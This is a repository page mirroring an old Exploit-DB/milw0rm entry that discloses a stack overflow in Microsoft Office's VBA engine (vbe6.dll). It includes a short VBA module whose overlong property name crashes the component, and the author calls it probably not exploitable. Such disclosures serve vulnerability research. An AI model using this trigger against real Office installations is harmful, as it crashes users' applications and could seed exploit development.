bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/5321.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

17 lines
No EOL
802 B
Text
Raw Permalink Blame History

Stack overflow in vbe6.dll, (used by all versions of MS Office)
The overflow occurs in Visual Basic for Application.
Creating a property with a long name ( about 247 chars) results in a stack overflow in vbe6.dll which overwrites with a null byte the first byte of the return address.
Probably impossible to exploit, but who knows? ^^ At least, there still exist stack overflows in Office apps :P
Marsu <Marsupilamipowa@hotmail.fr>
Module1.bas:
Attribute VB_Name = "Module1"
Public Property Get aaabcdefghissssssaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabdaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaasssssssssssssssssssssssssssssssssssssssssssssssssssade() As Variant
End Property
# milw0rm.com [2008-03-30]
Reference in a new issue View git blame Copy permalink